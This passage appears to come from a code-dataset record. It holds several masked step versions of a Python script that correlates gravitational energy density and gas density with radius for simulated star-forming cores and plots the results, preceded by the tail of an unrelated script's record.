a_init_prev=a_init;b_init_prev=b_init;theta_init_prev=theta_init\r\n \r\ndef get_values_from_df(df,index,key):\r\n return df.loc[index,key]\r\n\r\ndef update_value_in_df(df,index,key,value):\r\n df.loc[index,key]=value\r\n return df\r\n\r\ndef filter_df(df, dict_filter):\r\n query = []\r\n for k, v in dict_filter.items():\r\n if type(v)==str:\r\n query.append('{} == \"{}\"'.format(k,v))\r\n else:\r\n query.append('{} == {}'.format(k,v))\r\n df_filtered = df.query(' and '.join(query))\r\n return df_filtered\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument('--init',action='store_true')\r\n 
parser.add_argument('--isTest',action='store_true')\r\n parser.add_argument('--auto-dir',type=str,help='path to dir which includes gaussian, gaussview and csv')\r\n parser.add_argument('--monomer-name',type=str,help='monomer name')\r\n parser.add_argument('--num-nodes',type=int,help='num nodes')\r\n \r\n args = parser.parse_args()\r\n\r\n if args.init:\r\n print(\"----initial process----\")\r\n init_process(args)\r\n \r\n print(\"----main process----\")\r\n main_process(args)\r\n print(\"----finish process----\")\r\n ",
"step-ids": [
3,
7,
9,
10,
12
]
}
|
[
3,
7,
9,
10,
12
] |
from starter2 import *
from collections import defaultdict
import scipy
import colors
import hair_dryer
reload(hair_dryer)
import three_loopers_u500 as TL
import movie_frames
def GE_pearson(this_looper,core_list=None):
if core_list is None:
core_list = np.unique(this_looper.tr.core_ids)
name = this_looper.sim_name
thtr=this_looper.tr
mask = movie_frames.quantized_mask(this_looper).flatten()
times=thtr.times[mask]+0 #the zero makes a copy
times.shape=times.size,1
times=times/colors.tff
G = colors.G
#gx = thtr.track_dict['grav_x']
#gy = thtr.track_dict['grav_y']
#gz = thtr.track_dict['grav_z']
#GE2 = -1/(8*np.pi)*(gx*gx+gy*gy+gz*gz)
#ge_min=GE2.min()
#ge_max=GE2.max()
PearsonR = np.zeros([len(core_list), len(times)])
PearsonP = np.zeros([len(core_list), len(times)])
PearsonRho = np.zeros([len(core_list), len(times)])
PeakRho = np.zeros([len(core_list), len(times)])
for nc, core_id in enumerate(core_list):
print('GE pearson %s %d'%(name,core_id))
ms = trackage.mini_scrubber(thtr,core_id, do_velocity=False)
#ms.particle_pos(core_id)
if ms.nparticles < 1000:
sl=slice(None)
c=[0.5]*4
else:
sl = slice(None,None,10)
#c=[0,0,0,0.1]
c=[0.1]*4
rho = ms.density[sl]
rho = rho[:,mask]
PeakRho[nc,:]=rho.max(axis=0)
gx = thtr.c([core_id],'grav_x')[sl][:,mask]
gy = thtr.c([core_id],'grav_y')[sl][:,mask]
gz = thtr.c([core_id],'grav_z')[sl][:,mask]
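        # gravitational energy density u_g = |grad(phi)|^2 / (8*pi*G), per particle and per kept snapshot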
GE2 = 1/(8*np.pi*G)*(gx*gx+gy*gy+gz*gz)
RRR = ms.r[sl][:,mask]
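        # per-snapshot Pearson correlation in log-log space: how tightly GE2 (and rho)
        # follow a power law in particle radius r for this core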
for n in range(GE2.shape[1]):
the_x=np.log(RRR[:,n])
the_y=np.log(GE2[:,n])
#the_y=rho[:,n]
r,p=scipy.stats.pearsonr(the_x,the_y)
PearsonR[nc,n]=r
PearsonP[nc,n]=p
the_y=np.log(rho[:,n])
r,p=scipy.stats.pearsonr(the_x,the_y)
PearsonRho[nc,n]=r
if 0:
fig,ax=plt.subplots(1,2)
ax[0].plot(times,PearsonR)
#ax[0].boxplot(PearsonR)
#ax[1].boxplot(PearsonRho)
fig.savefig('plots_to_sort/phi_box_%s.png'%name)
return {'PR':PearsonR, 'PP':PearsonP, 'Prho':PearsonRho, 'T':times, 'PeakRho':PeakRho}
if 0:
fig,ax=plt.subplots(1,1)
ax.plot(times , GE2, c=c, linewidth=0.1)
axbonk(ax,xlabel=r'$t/t_{ff}$', ylabel=r'$(\nabla \phi)^2/8 pi G$',yscale='log', ylim=[ge_min,ge_max])
ax2=ax.twinx()
c=[1.0,0.1,0.1,0.1]
ax2.plot(times , rho, c=c, linewidth=0.1)
axbonk(ax2,xlabel=r'$t/t_{ff}$', ylabel=r'$\rho$',yscale='log')
outname='plots_to_sort/%s_GE_t_c%04d.png'%(this_looper.sim_name,core_id)
fig.savefig(outname)
print(outname)
sims=['u501', 'u502','u503']
if 'stuff' not in dir():
stuff={}
for sim in sims:
core_list = np.unique(TL.loops[sim].tr.core_ids)
#core_list=core_list[:10]
stuff[sim] = GE_pearson(TL.loops[sim],core_list=core_list)
if 1:
for sim in stuff:
fig,ax=plt.subplots(1,1)
T = stuff[sim]['T']
rho=stuff[sim]['PeakRho']
Rphi=stuff[sim]['PR']
ax.plot(Rphi.transpose() ,rho.transpose(),c=[0.1]*4)
axbonk(ax,xlabel='time',ylabel='rho max', yscale='log')
fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png'%sim)
if 1:
for sim in stuff:
fig,ax=plt.subplots(1,1)
T = stuff[sim]['T']
rho=stuff[sim]['PeakRho']
ax.plot(T,rho.transpose(),c=[0.1]*4)
axbonk(ax,xlabel='time',ylabel='rho max', yscale='log')
fig.savefig('plots_to_sort/peak_rho_%s.png'%sim)
if 0:
for sim in stuff:
fig,ax=plt.subplots(1,1)
c=[0.1]*4
#ax.plot( stuff[sim]['T'], stuff[sim]['PR'].transpose(),c=c)
#ax.scatter( stuff[sim]['Prho'].transpose(), stuff[sim]['PR'].transpose(),c=c)
XX,YY= stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()
ok = (~np.isnan(XX))*(~np.isnan(YY))
XX=XX[ok]
YY=YY[ok]
xbins = np.linspace( XX.min(), XX.max(), 64)
ybins = np.linspace( YY.min(), YY.max(), 64)
hist, xb, yb = np.histogram2d(XX,YY, bins=[xbins,ybins])
import pcolormesh_helper as pch
pch.helper(hist,xb,yb,ax=ax)
fig.savefig('plots_to_sort/RGE_Rrho_%s.png'%sim)
if 1:
for sim in stuff:
fig,ax=plt.subplots(1,2)
Rphi = stuff[sim]['PR']
ax[0].boxplot( Rphi )
ax[0].plot( Rphi.mean(axis=0))
ax[1].boxplot( stuff[sim]['Prho'])
axbonk(ax[0],xlabel='frame',ylabel='Rgrad phi')
axbonk(ax[1],xlabel='frame',ylabel='R rho')
fig.savefig('plots_to_sort/Boxes_%s.png'%(sim))
if 0:
from scipy.ndimage import gaussian_filter
fig,ax=plt.subplots()
for sim in stuff:
Rphi = stuff[sim]['PR']
Rrho = stuff[sim]['Prho']
ax.plot( gaussian_filter(Rphi.mean(axis=0),1), colors.color[sim] +'--')
ax.plot( Rrho.mean(axis=0), colors.color[sim])
axbonk(ax,xlabel='frame',ylabel='Rgrad phi')
fig.savefig('plots_to_sort/MeanR_%s.png'%(sim))
|
normal
|
{
"blob_id": "0762c5bec2d796bb7888e3de45e29fb20f88f491",
"index": 392,
"step-1": "<mask token>\n\n\ndef GE_pearson(this_looper, core_list=None):\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n name = this_looper.sim_name\n thtr = this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times = thtr.times[mask] + 0\n times.shape = times.size, 1\n times = times / colors.tff\n G = colors.G\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d' % (name, core_id))\n ms = trackage.mini_scrubber(thtr, core_id, do_velocity=False)\n if ms.nparticles < 1000:\n sl = slice(None)\n c = [0.5] * 4\n else:\n sl = slice(None, None, 10)\n c = [0.1] * 4\n rho = ms.density[sl]\n rho = rho[:, mask]\n PeakRho[nc, :] = rho.max(axis=0)\n gx = thtr.c([core_id], 'grav_x')[sl][:, mask]\n gy = thtr.c([core_id], 'grav_y')[sl][:, mask]\n gz = thtr.c([core_id], 'grav_z')[sl][:, mask]\n GE2 = 1 / (8 * np.pi * G) * (gx * gx + gy * gy + gz * gz)\n RRR = ms.r[sl][:, mask]\n for n in range(GE2.shape[1]):\n the_x = np.log(RRR[:, n])\n the_y = np.log(GE2[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonR[nc, n] = r\n PearsonP[nc, n] = p\n the_y = np.log(rho[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonRho[nc, n] = r\n if 0:\n fig, ax = plt.subplots(1, 2)\n ax[0].plot(times, PearsonR)\n fig.savefig('plots_to_sort/phi_box_%s.png' % name)\n return {'PR': PearsonR, 'PP': PearsonP, 'Prho': PearsonRho, 'T': times,\n 'PeakRho': PeakRho}\n if 0:\n fig, ax = plt.subplots(1, 1)\n ax.plot(times, GE2, c=c, linewidth=0.1)\n axbonk(ax, xlabel='$t/t_{ff}$', ylabel='$(\\\\nabla \\\\phi)^2/8 pi G$',\n yscale='log', ylim=[ge_min, ge_max])\n ax2 = ax.twinx()\n c = [1.0, 0.1, 0.1, 0.1]\n ax2.plot(times, rho, c=c, linewidth=0.1)\n axbonk(ax2, xlabel='$t/t_{ff}$', ylabel='$\\\\rho$', yscale='log')\n outname = 'plots_to_sort/%s_GE_t_c%04d.png' % (this_looper.sim_name,\n core_id)\n fig.savefig(outname)\n print(outname)\n\n\n<mask token>\n",
"step-2": "<mask token>\nreload(hair_dryer)\n<mask token>\n\n\ndef GE_pearson(this_looper, core_list=None):\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n name = this_looper.sim_name\n thtr = this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times = thtr.times[mask] + 0\n times.shape = times.size, 1\n times = times / colors.tff\n G = colors.G\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d' % (name, core_id))\n ms = trackage.mini_scrubber(thtr, core_id, do_velocity=False)\n if ms.nparticles < 1000:\n sl = slice(None)\n c = [0.5] * 4\n else:\n sl = slice(None, None, 10)\n c = [0.1] * 4\n rho = ms.density[sl]\n rho = rho[:, mask]\n PeakRho[nc, :] = rho.max(axis=0)\n gx = thtr.c([core_id], 'grav_x')[sl][:, mask]\n gy = thtr.c([core_id], 'grav_y')[sl][:, mask]\n gz = thtr.c([core_id], 'grav_z')[sl][:, mask]\n GE2 = 1 / (8 * np.pi * G) * (gx * gx + gy * gy + gz * gz)\n RRR = ms.r[sl][:, mask]\n for n in range(GE2.shape[1]):\n the_x = np.log(RRR[:, n])\n the_y = np.log(GE2[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonR[nc, n] = r\n PearsonP[nc, n] = p\n the_y = np.log(rho[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonRho[nc, n] = r\n if 0:\n fig, ax = plt.subplots(1, 2)\n ax[0].plot(times, PearsonR)\n fig.savefig('plots_to_sort/phi_box_%s.png' % name)\n return {'PR': PearsonR, 'PP': PearsonP, 'Prho': PearsonRho, 'T': times,\n 'PeakRho': PeakRho}\n if 0:\n fig, ax = plt.subplots(1, 1)\n ax.plot(times, GE2, c=c, linewidth=0.1)\n axbonk(ax, xlabel='$t/t_{ff}$', ylabel='$(\\\\nabla \\\\phi)^2/8 pi G$',\n yscale='log', ylim=[ge_min, ge_max])\n ax2 = ax.twinx()\n c = [1.0, 0.1, 0.1, 0.1]\n ax2.plot(times, rho, c=c, linewidth=0.1)\n axbonk(ax2, xlabel='$t/t_{ff}$', ylabel='$\\\\rho$', yscale='log')\n outname = 'plots_to_sort/%s_GE_t_c%04d.png' % (this_looper.sim_name,\n core_id)\n fig.savefig(outname)\n print(outname)\n\n\n<mask token>\nif 'stuff' not in dir():\n stuff = {}\n for sim in sims:\n core_list = np.unique(TL.loops[sim].tr.core_ids)\n stuff[sim] = GE_pearson(TL.loops[sim], core_list=core_list)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n Rphi = stuff[sim]['PR']\n ax.plot(Rphi.transpose(), rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n ax.plot(T, rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_%s.png' % sim)\nif 0:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n c = [0.1] * 4\n XX, YY = stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()\n ok = ~np.isnan(XX) * ~np.isnan(YY)\n XX = XX[ok]\n YY = YY[ok]\n xbins = np.linspace(XX.min(), XX.max(), 64)\n ybins = np.linspace(YY.min(), YY.max(), 64)\n hist, xb, yb = np.histogram2d(XX, YY, bins=[xbins, ybins])\n import pcolormesh_helper as pch\n pch.helper(hist, xb, yb, ax=ax)\n fig.savefig('plots_to_sort/RGE_Rrho_%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 2)\n Rphi = stuff[sim]['PR']\n ax[0].boxplot(Rphi)\n ax[0].plot(Rphi.mean(axis=0))\n 
ax[1].boxplot(stuff[sim]['Prho'])\n axbonk(ax[0], xlabel='frame', ylabel='Rgrad phi')\n axbonk(ax[1], xlabel='frame', ylabel='R rho')\n fig.savefig('plots_to_sort/Boxes_%s.png' % sim)\nif 0:\n from scipy.ndimage import gaussian_filter\n fig, ax = plt.subplots()\n for sim in stuff:\n Rphi = stuff[sim]['PR']\n Rrho = stuff[sim]['Prho']\n ax.plot(gaussian_filter(Rphi.mean(axis=0), 1), colors.color[sim] + '--'\n )\n ax.plot(Rrho.mean(axis=0), colors.color[sim])\n axbonk(ax, xlabel='frame', ylabel='Rgrad phi')\n fig.savefig('plots_to_sort/MeanR_%s.png' % sim)\n",
"step-3": "<mask token>\nreload(hair_dryer)\n<mask token>\n\n\ndef GE_pearson(this_looper, core_list=None):\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n name = this_looper.sim_name\n thtr = this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times = thtr.times[mask] + 0\n times.shape = times.size, 1\n times = times / colors.tff\n G = colors.G\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d' % (name, core_id))\n ms = trackage.mini_scrubber(thtr, core_id, do_velocity=False)\n if ms.nparticles < 1000:\n sl = slice(None)\n c = [0.5] * 4\n else:\n sl = slice(None, None, 10)\n c = [0.1] * 4\n rho = ms.density[sl]\n rho = rho[:, mask]\n PeakRho[nc, :] = rho.max(axis=0)\n gx = thtr.c([core_id], 'grav_x')[sl][:, mask]\n gy = thtr.c([core_id], 'grav_y')[sl][:, mask]\n gz = thtr.c([core_id], 'grav_z')[sl][:, mask]\n GE2 = 1 / (8 * np.pi * G) * (gx * gx + gy * gy + gz * gz)\n RRR = ms.r[sl][:, mask]\n for n in range(GE2.shape[1]):\n the_x = np.log(RRR[:, n])\n the_y = np.log(GE2[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonR[nc, n] = r\n PearsonP[nc, n] = p\n the_y = np.log(rho[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonRho[nc, n] = r\n if 0:\n fig, ax = plt.subplots(1, 2)\n ax[0].plot(times, PearsonR)\n fig.savefig('plots_to_sort/phi_box_%s.png' % name)\n return {'PR': PearsonR, 'PP': PearsonP, 'Prho': PearsonRho, 'T': times,\n 'PeakRho': PeakRho}\n if 0:\n fig, ax = plt.subplots(1, 1)\n ax.plot(times, GE2, c=c, linewidth=0.1)\n axbonk(ax, xlabel='$t/t_{ff}$', ylabel='$(\\\\nabla \\\\phi)^2/8 pi G$',\n yscale='log', ylim=[ge_min, ge_max])\n ax2 = ax.twinx()\n c = [1.0, 0.1, 0.1, 0.1]\n ax2.plot(times, rho, c=c, linewidth=0.1)\n axbonk(ax2, xlabel='$t/t_{ff}$', ylabel='$\\\\rho$', yscale='log')\n outname = 'plots_to_sort/%s_GE_t_c%04d.png' % (this_looper.sim_name,\n core_id)\n fig.savefig(outname)\n print(outname)\n\n\nsims = ['u501', 'u502', 'u503']\nif 'stuff' not in dir():\n stuff = {}\n for sim in sims:\n core_list = np.unique(TL.loops[sim].tr.core_ids)\n stuff[sim] = GE_pearson(TL.loops[sim], core_list=core_list)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n Rphi = stuff[sim]['PR']\n ax.plot(Rphi.transpose(), rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n ax.plot(T, rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_%s.png' % sim)\nif 0:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n c = [0.1] * 4\n XX, YY = stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()\n ok = ~np.isnan(XX) * ~np.isnan(YY)\n XX = XX[ok]\n YY = YY[ok]\n xbins = np.linspace(XX.min(), XX.max(), 64)\n ybins = np.linspace(YY.min(), YY.max(), 64)\n hist, xb, yb = np.histogram2d(XX, YY, bins=[xbins, ybins])\n import pcolormesh_helper as pch\n pch.helper(hist, xb, yb, ax=ax)\n fig.savefig('plots_to_sort/RGE_Rrho_%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 2)\n Rphi = stuff[sim]['PR']\n ax[0].boxplot(Rphi)\n 
ax[0].plot(Rphi.mean(axis=0))\n ax[1].boxplot(stuff[sim]['Prho'])\n axbonk(ax[0], xlabel='frame', ylabel='Rgrad phi')\n axbonk(ax[1], xlabel='frame', ylabel='R rho')\n fig.savefig('plots_to_sort/Boxes_%s.png' % sim)\nif 0:\n from scipy.ndimage import gaussian_filter\n fig, ax = plt.subplots()\n for sim in stuff:\n Rphi = stuff[sim]['PR']\n Rrho = stuff[sim]['Prho']\n ax.plot(gaussian_filter(Rphi.mean(axis=0), 1), colors.color[sim] + '--'\n )\n ax.plot(Rrho.mean(axis=0), colors.color[sim])\n axbonk(ax, xlabel='frame', ylabel='Rgrad phi')\n fig.savefig('plots_to_sort/MeanR_%s.png' % sim)\n",
"step-4": "from starter2 import *\nfrom collections import defaultdict\nimport scipy\nimport colors\nimport hair_dryer\nreload(hair_dryer)\nimport three_loopers_u500 as TL\nimport movie_frames\n\n\ndef GE_pearson(this_looper, core_list=None):\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n name = this_looper.sim_name\n thtr = this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times = thtr.times[mask] + 0\n times.shape = times.size, 1\n times = times / colors.tff\n G = colors.G\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d' % (name, core_id))\n ms = trackage.mini_scrubber(thtr, core_id, do_velocity=False)\n if ms.nparticles < 1000:\n sl = slice(None)\n c = [0.5] * 4\n else:\n sl = slice(None, None, 10)\n c = [0.1] * 4\n rho = ms.density[sl]\n rho = rho[:, mask]\n PeakRho[nc, :] = rho.max(axis=0)\n gx = thtr.c([core_id], 'grav_x')[sl][:, mask]\n gy = thtr.c([core_id], 'grav_y')[sl][:, mask]\n gz = thtr.c([core_id], 'grav_z')[sl][:, mask]\n GE2 = 1 / (8 * np.pi * G) * (gx * gx + gy * gy + gz * gz)\n RRR = ms.r[sl][:, mask]\n for n in range(GE2.shape[1]):\n the_x = np.log(RRR[:, n])\n the_y = np.log(GE2[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonR[nc, n] = r\n PearsonP[nc, n] = p\n the_y = np.log(rho[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonRho[nc, n] = r\n if 0:\n fig, ax = plt.subplots(1, 2)\n ax[0].plot(times, PearsonR)\n fig.savefig('plots_to_sort/phi_box_%s.png' % name)\n return {'PR': PearsonR, 'PP': PearsonP, 'Prho': PearsonRho, 'T': times,\n 'PeakRho': PeakRho}\n if 0:\n fig, ax = plt.subplots(1, 1)\n ax.plot(times, GE2, c=c, linewidth=0.1)\n axbonk(ax, xlabel='$t/t_{ff}$', ylabel='$(\\\\nabla \\\\phi)^2/8 pi G$',\n yscale='log', ylim=[ge_min, ge_max])\n ax2 = ax.twinx()\n c = [1.0, 0.1, 0.1, 0.1]\n ax2.plot(times, rho, c=c, linewidth=0.1)\n axbonk(ax2, xlabel='$t/t_{ff}$', ylabel='$\\\\rho$', yscale='log')\n outname = 'plots_to_sort/%s_GE_t_c%04d.png' % (this_looper.sim_name,\n core_id)\n fig.savefig(outname)\n print(outname)\n\n\nsims = ['u501', 'u502', 'u503']\nif 'stuff' not in dir():\n stuff = {}\n for sim in sims:\n core_list = np.unique(TL.loops[sim].tr.core_ids)\n stuff[sim] = GE_pearson(TL.loops[sim], core_list=core_list)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n Rphi = stuff[sim]['PR']\n ax.plot(Rphi.transpose(), rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png' % sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n T = stuff[sim]['T']\n rho = stuff[sim]['PeakRho']\n ax.plot(T, rho.transpose(), c=[0.1] * 4)\n axbonk(ax, xlabel='time', ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_%s.png' % sim)\nif 0:\n for sim in stuff:\n fig, ax = plt.subplots(1, 1)\n c = [0.1] * 4\n XX, YY = stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()\n ok = ~np.isnan(XX) * ~np.isnan(YY)\n XX = XX[ok]\n YY = YY[ok]\n xbins = np.linspace(XX.min(), XX.max(), 64)\n ybins = np.linspace(YY.min(), YY.max(), 64)\n hist, xb, yb = np.histogram2d(XX, YY, bins=[xbins, ybins])\n import pcolormesh_helper as pch\n pch.helper(hist, xb, yb, ax=ax)\n fig.savefig('plots_to_sort/RGE_Rrho_%s.png' % 
sim)\nif 1:\n for sim in stuff:\n fig, ax = plt.subplots(1, 2)\n Rphi = stuff[sim]['PR']\n ax[0].boxplot(Rphi)\n ax[0].plot(Rphi.mean(axis=0))\n ax[1].boxplot(stuff[sim]['Prho'])\n axbonk(ax[0], xlabel='frame', ylabel='Rgrad phi')\n axbonk(ax[1], xlabel='frame', ylabel='R rho')\n fig.savefig('plots_to_sort/Boxes_%s.png' % sim)\nif 0:\n from scipy.ndimage import gaussian_filter\n fig, ax = plt.subplots()\n for sim in stuff:\n Rphi = stuff[sim]['PR']\n Rrho = stuff[sim]['Prho']\n ax.plot(gaussian_filter(Rphi.mean(axis=0), 1), colors.color[sim] + '--'\n )\n ax.plot(Rrho.mean(axis=0), colors.color[sim])\n axbonk(ax, xlabel='frame', ylabel='Rgrad phi')\n fig.savefig('plots_to_sort/MeanR_%s.png' % sim)\n",
"step-5": "\nfrom starter2 import *\nfrom collections import defaultdict\nimport scipy\nimport colors\n\nimport hair_dryer\nreload(hair_dryer)\n\nimport three_loopers_u500 as TL\nimport movie_frames \n\ndef GE_pearson(this_looper,core_list=None):\n\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n\n name = this_looper.sim_name\n thtr=this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times=thtr.times[mask]+0 #the zero makes a copy\n times.shape=times.size,1\n times=times/colors.tff\n G = colors.G\n #gx = thtr.track_dict['grav_x']\n #gy = thtr.track_dict['grav_y']\n #gz = thtr.track_dict['grav_z']\n #GE2 = -1/(8*np.pi)*(gx*gx+gy*gy+gz*gz)\n #ge_min=GE2.min()\n #ge_max=GE2.max()\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d'%(name,core_id))\n\n \n ms = trackage.mini_scrubber(thtr,core_id, do_velocity=False)\n #ms.particle_pos(core_id)\n\n if ms.nparticles < 1000:\n sl=slice(None)\n c=[0.5]*4\n else:\n sl = slice(None,None,10)\n #c=[0,0,0,0.1]\n c=[0.1]*4\n\n rho = ms.density[sl]\n rho = rho[:,mask]\n\n PeakRho[nc,:]=rho.max(axis=0)\n\n gx = thtr.c([core_id],'grav_x')[sl][:,mask]\n gy = thtr.c([core_id],'grav_y')[sl][:,mask]\n gz = thtr.c([core_id],'grav_z')[sl][:,mask]\n GE2 = 1/(8*np.pi*G)*(gx*gx+gy*gy+gz*gz)\n\n RRR = ms.r[sl][:,mask]\n for n in range(GE2.shape[1]):\n the_x=np.log(RRR[:,n])\n the_y=np.log(GE2[:,n])\n #the_y=rho[:,n]\n r,p=scipy.stats.pearsonr(the_x,the_y)\n PearsonR[nc,n]=r\n PearsonP[nc,n]=p\n the_y=np.log(rho[:,n])\n r,p=scipy.stats.pearsonr(the_x,the_y)\n PearsonRho[nc,n]=r\n \n if 0:\n fig,ax=plt.subplots(1,2)\n ax[0].plot(times,PearsonR)\n #ax[0].boxplot(PearsonR)\n #ax[1].boxplot(PearsonRho)\n fig.savefig('plots_to_sort/phi_box_%s.png'%name)\n\n return {'PR':PearsonR, 'PP':PearsonP, 'Prho':PearsonRho, 'T':times, 'PeakRho':PeakRho}\n\n\n\n if 0:\n fig,ax=plt.subplots(1,1)\n ax.plot(times , GE2, c=c, linewidth=0.1)\n axbonk(ax,xlabel=r'$t/t_{ff}$', ylabel=r'$(\\nabla \\phi)^2/8 pi G$',yscale='log', ylim=[ge_min,ge_max])\n ax2=ax.twinx()\n c=[1.0,0.1,0.1,0.1]\n ax2.plot(times , rho, c=c, linewidth=0.1)\n axbonk(ax2,xlabel=r'$t/t_{ff}$', ylabel=r'$\\rho$',yscale='log')\n\n outname='plots_to_sort/%s_GE_t_c%04d.png'%(this_looper.sim_name,core_id)\n fig.savefig(outname)\n print(outname)\n\n\n\nsims=['u501', 'u502','u503']\nif 'stuff' not in dir():\n stuff={}\n for sim in sims:\n core_list = np.unique(TL.loops[sim].tr.core_ids)\n #core_list=core_list[:10]\n stuff[sim] = GE_pearson(TL.loops[sim],core_list=core_list)\n\nif 1:\n for sim in stuff:\n fig,ax=plt.subplots(1,1)\n T = stuff[sim]['T']\n rho=stuff[sim]['PeakRho']\n Rphi=stuff[sim]['PR']\n ax.plot(Rphi.transpose() ,rho.transpose(),c=[0.1]*4)\n axbonk(ax,xlabel='time',ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png'%sim)\n\nif 1:\n for sim in stuff:\n fig,ax=plt.subplots(1,1)\n T = stuff[sim]['T']\n rho=stuff[sim]['PeakRho']\n ax.plot(T,rho.transpose(),c=[0.1]*4)\n axbonk(ax,xlabel='time',ylabel='rho max', yscale='log')\n fig.savefig('plots_to_sort/peak_rho_%s.png'%sim)\n\nif 0:\n for sim in stuff:\n fig,ax=plt.subplots(1,1)\n c=[0.1]*4\n #ax.plot( stuff[sim]['T'], stuff[sim]['PR'].transpose(),c=c)\n #ax.scatter( stuff[sim]['Prho'].transpose(), stuff[sim]['PR'].transpose(),c=c)\n XX,YY= 
stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()\n ok = (~np.isnan(XX))*(~np.isnan(YY))\n XX=XX[ok]\n YY=YY[ok]\n xbins = np.linspace( XX.min(), XX.max(), 64)\n ybins = np.linspace( YY.min(), YY.max(), 64)\n hist, xb, yb = np.histogram2d(XX,YY, bins=[xbins,ybins])\n import pcolormesh_helper as pch\n pch.helper(hist,xb,yb,ax=ax)\n fig.savefig('plots_to_sort/RGE_Rrho_%s.png'%sim)\n\nif 1:\n for sim in stuff:\n fig,ax=plt.subplots(1,2)\n Rphi = stuff[sim]['PR']\n ax[0].boxplot( Rphi )\n ax[0].plot( Rphi.mean(axis=0))\n ax[1].boxplot( stuff[sim]['Prho'])\n\n\n axbonk(ax[0],xlabel='frame',ylabel='Rgrad phi')\n axbonk(ax[1],xlabel='frame',ylabel='R rho')\n fig.savefig('plots_to_sort/Boxes_%s.png'%(sim))\n\n\nif 0:\n from scipy.ndimage import gaussian_filter\n fig,ax=plt.subplots()\n for sim in stuff:\n Rphi = stuff[sim]['PR']\n Rrho = stuff[sim]['Prho']\n ax.plot( gaussian_filter(Rphi.mean(axis=0),1), colors.color[sim] +'--')\n ax.plot( Rrho.mean(axis=0), colors.color[sim])\n\n\n axbonk(ax,xlabel='frame',ylabel='Rgrad phi')\n 